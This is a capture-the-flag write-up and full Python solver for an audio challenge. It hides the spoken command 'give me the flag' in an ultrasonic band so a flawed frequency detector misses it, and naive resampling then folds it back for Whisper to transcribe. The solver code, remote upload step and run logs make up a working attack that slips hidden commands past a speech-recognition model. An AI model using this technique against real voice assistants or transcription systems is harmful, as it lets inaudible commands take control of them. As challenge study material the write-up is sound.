![[Pasted image 20251221024008.png]]
//TSG CTF – Mission Impossible (MISC)
Remote: http://35.194.98.181:57860/
Flag format: TSGCTF{...}
>TL;DR
- The service runs Whisper speech-to-text, but it also has a broken “intruder detector” that fires on any non-zero STFT energy below 10kHz.
- The key bug: it checks `magnitude > 0` after cutting high frequencies, so any low-frequency residue that survives the 0.01 noise threshold triggers `ALERT!`.
- Solution: craft an audio signal with all of its energy above 10kHz (so the detector sees exactly 0) that still becomes intelligible to Whisper after the server’s naive linear resampling (`res_type="linear"`) from a higher sample rate down to 16kHz.
- This is done by placing the speech signal in an ultrasonic band (single-sideband modulation) and relying on aliasing during the downsample to fold it back into the speech band.

Final flag:
TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
>1) Local analysis
1.1 Files
The attachment is a tiny tarball containing a Dockerized Gradio app.
Terminal transcript (local) (from local_analysis.log):
$ ls -la
(total listing omitted)
$ file -b mission_impossible.tar.gz
gzip compressed data, from Unix, original size modulo 2^32 10240
$ tar -xzvf mission_impossible.tar.gz -C extracted
mission_impossible/
mission_impossible/Dockerfile
mission_impossible/src/
mission_impossible/src/server.py
1.2 Reading the server
The core logic is in extracted/mission_impossible/src/server.py.
Key parts (verbatim):
def detect_intruder(freq_space, sr):
    cut_high_freqs(freq_space, sr, 10000)
    magnitude = np.abs(freq_space).max()
    return magnitude > 0
...
    freq_space = librosa.stft(wave, n_fft=N_FFT)
    freq_space[np.abs(freq_space) < 0.01] = 0
    wave = librosa.istft(freq_space)
    if detect_intruder(freq_space, sr):
        return "ALERT! Intruder detected!"
    wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
    result = whisper.transcribe(model, wave, temperature=0.0)["text"]
    if "give me the flag" in result.lower():
        return "OK, here is the flag: " + FLAG
1.3 What the bug means
- `detect_intruder()` cuts high frequencies (everything above 10kHz), then computes `magnitude = max(abs(freq_space))`.
- It returns `magnitude > 0`.

So the detector triggers if there is any non-zero STFT bin below 10kHz.
Because of the earlier “noise cancellation” step, `freq_space[np.abs(freq_space) < 0.01] = 0`, every bin with magnitude below 0.01 is already exactly zero. So we can aim to keep every STFT bin under 10kHz below that threshold: after their thresholding those bins are exactly 0, `magnitude == 0`, and the detector does not fire.

1.4 Why “ultrasonic + aliasing” is the right idea
At first this sounds impossible: if we remove everything below 10kHz, Whisper can’t hear the phrase, right?
But note the order:
- They compute the STFT and threshold it.
- They inverse-STFT back to `wave`.
- They call `detect_intruder(freq_space, sr)` on the thresholded frequency-domain array.
- If it is safe, they resample the time-domain `wave` to 16kHz using `res_type="linear"`.

So:

- We only need to make the STFT bins below 10kHz zero to bypass the detector.
- The time-domain `wave` is what Whisper actually hears. If that wave contains ultrasonic content and the resampling is naive, that content can alias into the audible range.

This is a classic signal-processing pitfall:
- Downsampling without a proper anti-alias low-pass filter folds high-frequency content into low frequencies.
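
A minimal numpy sketch of that pitfall. It assumes the server's linear resampler simply interpolates linearly at the output instants with no low-pass in front of it; `naive_linear_resample` and `dominant_freq` are illustrative helpers, not code from the challenge. A 17kHz tone sampled at 48kHz comes out of the 48kHz to 16kHz resample as a 1kHz tone:

```python
import numpy as np

SR_IN = 48_000   # attack sample rate (the solver's default)
SR_OUT = 16_000  # Whisper's sample rate


def naive_linear_resample(x: np.ndarray, sr_in: int, sr_out: int) -> np.ndarray:
    """Linear interpolation with no anti-alias low-pass in front of it."""
    n_out = int(round(len(x) * sr_out / sr_in))
    positions = np.arange(n_out) * (sr_in / sr_out)  # output instants, in input samples
    return np.interp(positions, np.arange(len(x)), x)


def dominant_freq(x: np.ndarray, sr: int) -> float:
    """Frequency (Hz) of the strongest bin of a Hann-windowed spectrum."""
    spectrum = np.abs(np.fft.rfft(x * np.hanning(len(x))))
    return float(np.fft.rfftfreq(len(x), d=1.0 / sr)[np.argmax(spectrum)])


t = np.arange(SR_IN) / SR_IN            # one second at 48 kHz
tone = np.cos(2 * np.pi * 17_000 * t)   # 17 kHz, well above the 8 kHz output Nyquist
down = naive_linear_resample(tone, SR_IN, SR_OUT)

print(round(dominant_freq(tone, SR_IN)), round(dominant_freq(down, SR_OUT)))  # 17000 1000
```

Nothing in the resampler "knows" the tone was out of band; the 17kHz content is simply indistinguishable from 1kHz once it is sampled at 16kHz.
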
That gave the core exploitation idea:
Encode the command phrase into an ultrasonic band (>10kHz). The detector sees 0 (because it removes those bins). Then the server’s naive resampling folds (aliases) that ultrasonic band back into the speech band, and Whisper transcribes it.
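
Worked arithmetic for why a 16kHz carrier is convenient, assuming the 48kHz to 16kHz linear resampler evaluates the input exactly at every third sample (the ratio is the integer 3), so it reduces to plain decimation $y[n] = x[3n]$:

$$
\cos\!\left(2\pi (f_c + f)\,\frac{3n}{48000}\right)
= \cos\!\left(2\pi n\,\frac{f_c}{16000} + 2\pi f\,\frac{n}{16000}\right)
= \cos\!\left(2\pi f\,\frac{n}{16000}\right) \quad \text{for } f_c = 16000\ \text{Hz}.
$$

The upper sideband at $f_c + f$ (about 16 to 20kHz for speech band-limited to 4kHz) therefore lands at $f$ in the 16kHz stream, which is the band Whisper listens to. If the interpolation points fall between input samples, the frequency mapping is the same, but the linear interpolator also attenuates the folded band somewhat.
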
>2) Building the exploit locally
2.1 Tooling
I needed:

- `espeak-ng` to synthesize “give me the flag” reproducibly
- Python libraries for signal processing (`numpy`, `scipy`, `soundfile`, `librosa`), plus `httpx` for the remote step

(Installed in this environment with apt/pip.)

2.2 How the payload is constructed
Steps:
- Synthesize a clean baseband speech waveform (`WHISPER_SR=16000`).
- Low-pass it (≈4kHz) so it fits nicely inside a modulation bandwidth.
- Upsample to 48kHz.
- Perform single-sideband modulation (SSB) via the analytic signal (Hilbert transform):
$$
x_{\text{ssb}}(t) = \operatorname{Re}\left\{ \left( x(t) + j\,\hat{x}(t) \right) e^{j 2\pi f_c t} \right\}
$$
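where $\hat{x}(t)$ is the Hilbert transform of $x(t)$. This shifts the speech spectrum up by the carrier frequency $f_c$ (default 16kHz), so speech band-limited to about 4kHz lands at roughly 16 to 20kHz, with no mirrored lower sideband.
- Apply a strong high-pass filter (e.g. 13kHz) so any residual energy below 10kHz is pushed well under the detector's 0.01 threshold.
- Save as a standard PCM16 WAV.
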
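
A small numpy/scipy sketch of the modulate-then-high-pass steps, using a pure 1kHz tone as a stand-in for speech so the result is easy to check (that substitution is an assumption for illustration). It uses `scipy.signal.hilbert` for the analytic signal and a Butterworth high-pass in second-order sections with `sosfiltfilt`, whereas the solver uses `butter` + `filtfilt` in b/a form; the helper names are hypothetical. With upper-sideband SSB the tone should end up almost entirely at 17kHz, with essentially nothing at the 15kHz mirror image or below 10kHz:

```python
import numpy as np
from scipy.signal import butter, hilbert, sosfiltfilt

SR = 48_000
FC = 16_000.0  # carrier, same as the solver's default --carrier


def ssb_upper(x: np.ndarray, sr: int, fc: float) -> np.ndarray:
    """Upper-sideband SSB: Re{(x + j*H{x}) * exp(j*2*pi*fc*t)}."""
    t = np.arange(len(x), dtype=np.float64) / sr
    return np.real(hilbert(x) * np.exp(2j * np.pi * fc * t))


def highpass(x: np.ndarray, sr: int, cutoff_hz: float, order: int = 6) -> np.ndarray:
    """Zero-phase Butterworth high-pass in second-order sections."""
    sos = butter(order, cutoff_hz, btype="highpass", fs=sr, output="sos")
    return sosfiltfilt(sos, x)


def band_energy(x: np.ndarray, sr: int, lo: float, hi: float) -> float:
    """Energy of the Hann-windowed spectrum of x inside [lo, hi) Hz."""
    spec = np.abs(np.fft.rfft(x * np.hanning(len(x)))) ** 2
    freqs = np.fft.rfftfreq(len(x), d=1.0 / sr)
    return float(spec[(freqs >= lo) & (freqs < hi)].sum())


t = np.arange(SR) / SR
baseband = np.cos(2 * np.pi * 1_000 * t)             # stand-in for band-limited speech
shifted = highpass(ssb_upper(baseband, SR, FC), SR, 13_000)
core = shifted[SR // 10 : len(shifted) - SR // 10]   # skip the filter's edge transients

total = band_energy(core, SR, 0, SR / 2)
for label, lo, hi in [("17 kHz (USB)", 16_900, 17_100),
                      ("15 kHz (LSB image)", 14_900, 15_100),
                      ("below 10 kHz", 0, 10_000)]:
    print(f"{label}: {band_energy(core, SR, lo, hi) / total:.3e}")
```

Plain AM (the solver's `--mode am`) would also put a lower sideband at 12 to 16kHz; the analytic-signal route avoids that image entirely.
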
2.3 Local verification (important)
Before even touching the remote, the solver emulates the server’s detection logic:
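- STFT (`n_fft=400`)
- zero every bin whose magnitude is below 0.01
- cut frequencies above 10kHz and take the maximum magnitude of what is left

If that maximum is exactly 0.0, the detector will not trigger (assuming the server sees the samples at the same scale as the local emulation, since the 0.01 threshold is absolute).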
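
A dependency-light sketch of that check in plain numpy. It assumes the server's STFT behaves like `librosa.stft` with its defaults (centered frames, periodic Hann window, hop of `n_fft // 4`, zero padding at the edges) and that `cut_high_freqs` zeroes every bin from `int(10000 * n_fft / sr)` upward, which is the rule the solver's `server_like_local_check` uses; the real `cut_high_freqs` body is not in the excerpt. The faded sine tones are illustrative stand-ins for speech: a 1kHz tone should trip the detector, while a 17kHz tone should leave exactly 0.0.

```python
import numpy as np

SR = 48_000
N_FFT = 400          # value used by server.py and the solver
HOP = N_FFT // 4     # librosa.stft default hop_length
THRESH = 0.01        # server-side "noise cancellation" threshold
CUTOFF_HZ = 10_000   # detector cutoff


def stft(x: np.ndarray) -> np.ndarray:
    """Centered, periodic-Hann STFT approximating librosa.stft's defaults."""
    window = np.hanning(N_FFT + 1)[:-1]              # periodic Hann
    x = np.pad(x, N_FFT // 2)                        # center=True with zero padding
    n_frames = 1 + (len(x) - N_FFT) // HOP
    frames = np.stack([x[i * HOP : i * HOP + N_FFT] * window for i in range(n_frames)])
    return np.fft.rfft(frames, axis=1).T             # shape (1 + N_FFT // 2, n_frames)


def intruder_magnitude(x: np.ndarray, sr: int) -> float:
    """Max |bin| below the cutoff after the server-style hard threshold."""
    spec = stft(x)
    spec[np.abs(spec) < THRESH] = 0                  # hard threshold -> exact zeros
    cutoff_bin = int(CUTOFF_HZ * N_FFT / sr)         # same bin rule as the solver
    return float(np.abs(spec[:cutoff_bin]).max())


def faded_tone(freq_hz: float, sr: int = SR, seconds: float = 1.0, ramp: int = 2400) -> np.ndarray:
    """0.5-amplitude tone with raised-cosine fade-in/out at both ends."""
    n = int(sr * seconds)
    x = 0.5 * np.cos(2 * np.pi * freq_hz * np.arange(n) / sr)
    fade = 0.5 - 0.5 * np.cos(np.pi * np.arange(ramp) / ramp)
    x[:ramp] *= fade
    x[-ramp:] *= fade[::-1]
    return x


print("1 kHz tone  ->", intruder_magnitude(faded_tone(1_000), SR))   # expected non-zero (ALERT)
print("17 kHz tone ->", intruder_magnitude(faded_tone(17_000), SR))  # expected 0.0 (passes)
```

The raised-cosine fades are there on purpose: a tone that switches on abruptly spreads energy across the whole spectrum of the first frame and can trip the detector on its own.
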
>3) Remote exploitation
3.1 API discovery
The UI is Gradio, and it exposes endpoints under the prefix shown in `/config`:
`api_prefix = /gradio_api`
The reliable way (it works even when the `gradio_client` API metadata is flaky) is to use:

- `POST /gradio_api/upload` to upload the WAV
- `POST /gradio_api/run/predict` with a `FileData` object referencing the uploaded server path

The solver does exactly this using httpx.
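
A stdlib-only sketch of the discovery step, so the endpoint URLs are derived from `/config` instead of being hard-coded. `gradio_endpoints` and `fetch_config` are hypothetical helpers; the sketch assumes the config JSON carries an `api_prefix` key (it was `/gradio_api` on this challenge), and placing the endpoints at the root when the key is absent is an assumption, not something verified here.

```python
import json
from urllib.parse import urljoin
from urllib.request import urlopen


def gradio_endpoints(base_url: str, config: dict) -> dict:
    """Build upload / run-predict URLs from a Gradio /config payload.

    Assumption: the config has an "api_prefix" key; if it is missing,
    the endpoints are placed at the app root.
    """
    prefix = str(config.get("api_prefix", "")).strip("/")
    root = base_url.rstrip("/") + "/"
    api_root = urljoin(root, prefix + "/") if prefix else root
    return {
        "upload": urljoin(api_root, "upload"),
        "predict": urljoin(api_root, "run/predict"),
    }


def fetch_config(base_url: str, timeout: float = 30.0) -> dict:
    """GET <base>/config and parse the JSON body."""
    with urlopen(base_url.rstrip("/") + "/config", timeout=timeout) as resp:
        return json.load(resp)
```

Usage against the challenge host would be `gradio_endpoints(url, fetch_config(url))`; the pure URL-building part is kept separate so it can be checked offline.
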
3.2 Successful remote run
Terminal transcript (remote) (from remote_run.log):
$ python3 solve_mission_impossible.py \
--out attack2.wav \
--mode ssb \
--repeat 8 \
--hp 13000 \
--remote http://35.194.98.181:57860/
[+] Wrote: /home/noigel/CTF/tsg/MISC/Mission_Impossible/attack2.wav
[+] Intruder magnitude after cut (should be 0.0): 0.0
[+] Alias self-corr sanity (higher is better): 0.9999
[+] Attack RMS: 0.104154
[+] Aliased (LP) RMS: 0.073874
[+] Remote response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
>4) Full solver code
File: solve_mission_impossible.py
#!/usr/bin/env python3
import argparse
import math
import os
import subprocess
import tempfile
from dataclasses import dataclass
from pathlib import Path
import numpy as np
import soundfile as sf
from scipy.signal import butter, filtfilt, hilbert
import librosa
def remote_run_predict(remote: str, wav_path: Path, timeout_s: float = 120.0) -> str:
    """Run the remote Gradio app via HTTP endpoints.

    Uses:
    - POST /gradio_api/upload
    - POST /gradio_api/run/predict
    """
    import httpx

    base = remote.rstrip("/")
    upload_url = f"{base}/gradio_api/upload"
    run_url = f"{base}/gradio_api/run/predict"
    with httpx.Client(timeout=timeout_s) as client:
        with wav_path.open("rb") as f:
            files = {"files": (wav_path.name, f, "audio/wav")}
            r = client.post(upload_url, files=files)
        r.raise_for_status()
        uploaded_path = r.json()[0]
        payload = {
            "data": [
                {
                    "path": uploaded_path,
                    "meta": {"_type": "gradio.FileData"},
                }
            ]
        }
        rr = client.post(run_url, json=payload)
        rr.raise_for_status()
        j = rr.json()
        return j.get("data", [""])[0]

N_FFT = 400
MAX_DURATION = 5
WHISPER_SR = 16000

@dataclass
class LocalCheckResult:
    intruder_magnitude_after_cut: float
    corr_base_vs_aliased: float
    base_rms: float
    attack_rms: float

def linear_resample(wave: np.ndarray, orig_sr: int, target_sr: int) -> np.ndarray:
    """Resample via linear interpolation (intentionally naive, to match the service)."""
    if orig_sr == target_sr:
        return wave.astype(np.float32, copy=False)
    if wave.ndim != 1:
        raise ValueError("linear_resample expects mono audio")
    if orig_sr <= 0 or target_sr <= 0:
        raise ValueError("Invalid sample rates")
    ratio = target_sr / float(orig_sr)
    out_len = max(1, int(round(len(wave) * ratio)))
    x_old = np.arange(len(wave), dtype=np.float32)
    x_new = np.linspace(0.0, float(len(wave) - 1), out_len, dtype=np.float32)
    return np.interp(x_new, x_old, wave.astype(np.float32, copy=False)).astype(np.float32, copy=False)

def _butter_filter(wave: np.ndarray, sr: int, kind: str, cutoff_hz: float, order: int = 6) -> np.ndarray:
    nyq = 0.5 * sr
    if cutoff_hz <= 0 or cutoff_hz >= nyq:
        raise ValueError(f"cutoff_hz must be within (0, {nyq})")
    w = cutoff_hz / nyq
    b, a = butter(order, w, btype=kind)
    return filtfilt(b, a, wave).astype(np.float32, copy=False)

def synthesize_phrase_espeak(phrase: str, out_wav: Path, sr: int = WHISPER_SR) -> None:
    out_wav.parent.mkdir(parents=True, exist_ok=True)
    cmd = [
        "espeak-ng",
        "-v",
        "en-us",
        "-s",
        "150",
        "-w",
        str(out_wav),
        phrase,
    ]
    subprocess.check_call(cmd)
    # espeak-ng chooses its own SR; normalize to requested.
    wave, in_sr = sf.read(out_wav, dtype="float32")
    if wave.ndim == 2:
        wave = wave.mean(axis=1)
    if in_sr != sr:
        wave = librosa.resample(wave, orig_sr=in_sr, target_sr=sr, res_type="kaiser_best")
    sf.write(out_wav, wave, sr)

def make_ultrasonic_attack(
    base_wave: np.ndarray,
    base_sr: int,
    attack_sr: int = 48000,
    base_lowpass_hz: float = 4000.0,
    carrier_hz: float = 16000.0,
    safety_highpass_hz: float = 10500.0,
    mode: str = "ssb",
) -> np.ndarray:
    if base_wave.ndim != 1:
        raise ValueError("base_wave must be mono")
    if base_sr <= 0 or attack_sr <= 0:
        raise ValueError("Invalid sample rates")
    # Trim to the service’s max duration.
    base_wave = base_wave[: int(MAX_DURATION * base_sr)].astype(np.float32, copy=False)
    # Band-limit so that, once shifted, everything stays above the 10k cutoff.
    base_wave = _butter_filter(base_wave, base_sr, "lowpass", base_lowpass_hz)
    # Upsample to a higher SR so we can place content in >10k.
    if base_sr != attack_sr:
        up = librosa.resample(base_wave, orig_sr=base_sr, target_sr=attack_sr, res_type="kaiser_best")
    else:
        up = base_wave
    # float64 time axis: float32 loses some carrier-phase precision after a few seconds.
    t = np.arange(len(up), dtype=np.float64) / float(attack_sr)
    if mode == "ssb":
        # Single-sideband modulation via analytic signal to avoid creating a low-frequency image.
        analytic = hilbert(up).astype(np.complex64, copy=False)
        shifted = np.real(analytic * np.exp(1j * (2.0 * math.pi * carrier_hz) * t)).astype(np.float32)
    elif mode == "am":
        # AM modulation: creates symmetric sidebands around the carrier.
        carrier = np.cos((2.0 * math.pi * carrier_hz) * t).astype(np.float32)
        # Add a small bias so the envelope survives thresholding better.
        shifted = ((0.75 * up + 0.25) * carrier).astype(np.float32)
    else:
        raise ValueError("mode must be 'ssb' or 'am'")
    # Extra safety: remove any residual energy below cutoff.
    shifted = _butter_filter(shifted, attack_sr, "highpass", safety_highpass_hz)
    # Normalize.
    peak = float(np.max(np.abs(shifted)) + 1e-9)
    shifted = (0.95 * shifted / peak).astype(np.float32)
    return shifted

def server_like_local_check(attack_wave: np.ndarray, sr: int) -> LocalCheckResult:
    # Emulate key parts of server.py without Whisper.
    wave = attack_wave[: int(MAX_DURATION * sr)].astype(np.float32, copy=False)
    # Server STFT + threshold.
    freq_space = librosa.stft(wave, n_fft=N_FFT)
    freq_space[np.abs(freq_space) < 0.01] = 0
    denoised = librosa.istft(freq_space)
    # detect_intruder: cut high freqs then magnitude check.
    cutoff_bin = int(10000 * N_FFT / sr)
    freq_cut = freq_space.copy()
    if cutoff_bin < freq_cut.shape[0]:
        freq_cut[cutoff_bin:, :] = 0
    magnitude = float(np.abs(freq_cut).max())
    aliased = linear_resample(denoised.astype(np.float32, copy=False), orig_sr=sr, target_sr=WHISPER_SR)
    # Compare against an expected “baseband” reconstruction: the aliasing should recover speech-ish content.
    # We use self-correlation proxy by comparing aliased to its own lowpassed version (gives a sanity signal).
    aliased_lp = _butter_filter(aliased.astype(np.float32), WHISPER_SR, "lowpass", 4000.0)
    n = min(len(aliased), len(aliased_lp))
    a = aliased[:n]
    b = aliased_lp[:n]
    denom = float(np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)
    corr = float(np.dot(a, b) / denom)
    return LocalCheckResult(
        intruder_magnitude_after_cut=magnitude,
        corr_base_vs_aliased=corr,
        base_rms=float(np.sqrt(np.mean(aliased_lp**2) + 1e-12)),
        attack_rms=float(np.sqrt(np.mean(wave**2) + 1e-12)),
    )

def write_int16_wav(path: Path, wave: np.ndarray, sr: int) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    wave = np.clip(wave, -1.0, 1.0)
    sf.write(path, (wave * 32767.0).astype(np.int16), sr, subtype="PCM_16")

def main() -> int:
    ap = argparse.ArgumentParser(description="TSGCTF Mission Impossible solver (local-first).")
    ap.add_argument("--out", default="attack.wav", help="Output attack WAV file")
    ap.add_argument("--phrase", default="give me the flag", help="Command phrase")
    ap.add_argument("--attack-sr", type=int, default=48000, help="Attack WAV sample rate")
    ap.add_argument("--carrier", type=float, default=16000.0, help="Carrier frequency (Hz)")
    ap.add_argument("--hp", type=float, default=10500.0, help="High-pass cutoff (Hz) to keep energy >10k")
    ap.add_argument("--mode", choices=["ssb", "am"], default="ssb", help="Ultrasonic modulation mode")
    ap.add_argument("--repeat", type=int, default=3, help="Repeat phrase N times for better recognition")
    ap.add_argument("--remote", default=None, help="Remote Gradio URL (optional)")
    ap.add_argument("--remote-timeout", type=float, default=180.0, help="Remote request timeout in seconds")
    args = ap.parse_args()
    out_path = Path(args.out).resolve()
    with tempfile.TemporaryDirectory() as td:
        base_wav = Path(td) / "base.wav"
        phrase = (" ".join([args.phrase] * max(1, int(args.repeat)))).strip()
        synthesize_phrase_espeak(phrase, base_wav, sr=WHISPER_SR)
        base_wave, base_sr = sf.read(base_wav, dtype="float32")
    if base_wave.ndim == 2:
        base_wave = base_wave.mean(axis=1)
    base_wave = base_wave.astype(np.float32, copy=False)
    attack = make_ultrasonic_attack(
        base_wave,
        base_sr,
        attack_sr=args.attack_sr,
        carrier_hz=args.carrier,
        safety_highpass_hz=args.hp,
        mode=args.mode,
    )
    write_int16_wav(out_path, attack, args.attack_sr)
    check = server_like_local_check(attack, args.attack_sr)
    print("[+] Wrote:", out_path)
    print("[+] Intruder magnitude after cut (should be 0.0):", check.intruder_magnitude_after_cut)
    print("[+] Alias self-corr sanity (higher is better):", f"{check.corr_base_vs_aliased:.4f}")
    print("[+] Attack RMS:", f"{check.attack_rms:.6f}")
    print("[+] Aliased (LP) RMS:", f"{check.base_rms:.6f}")
    if args.remote:
        msg = remote_run_predict(args.remote, out_path, timeout_s=float(args.remote_timeout))
        print("[+] Remote response:")
        print(msg)
    return 0

if __name__ == "__main__":
    raise SystemExit(main())
>5) References / concepts used
These are the ideas this challenge relies on (and what I used to reason about it):
- Nyquist–Shannon sampling theorem and aliasing (downsampling without proper anti-alias filtering):
  - https://en.wikipedia.org/wiki/Nyquist%E2%80%93Shannon_sampling_theorem
  - https://en.wikipedia.org/wiki/Aliasing
- Hilbert transform / analytic signal (to build single-sideband modulation):
  - https://en.wikipedia.org/wiki/Hilbert_transform
  - https://en.wikipedia.org/wiki/Single-sideband_modulation
- Gradio HTTP API endpoints (conceptually; the exact endpoints were confirmed from `/config` and `/gradio_api/openapi.json`):
>6) Notes / troubleshooting
- If you get `ALERT! Intruder detected!`, your payload still has non-zero energy below 10kHz after their STFT thresholding. Increase `--hp` (e.g. `13000`) and keep the signal normalized.
- If you get `Unknown command.`, Whisper didn’t recognize the phrase. Increase `--repeat` (I used 8) or try a different carrier.
>7) Reproduction checklist
From this folder:
# Local-only generation + detector check
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000
# Remote solve (prints flag)
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000 --remote http://35.194.98.181:57860/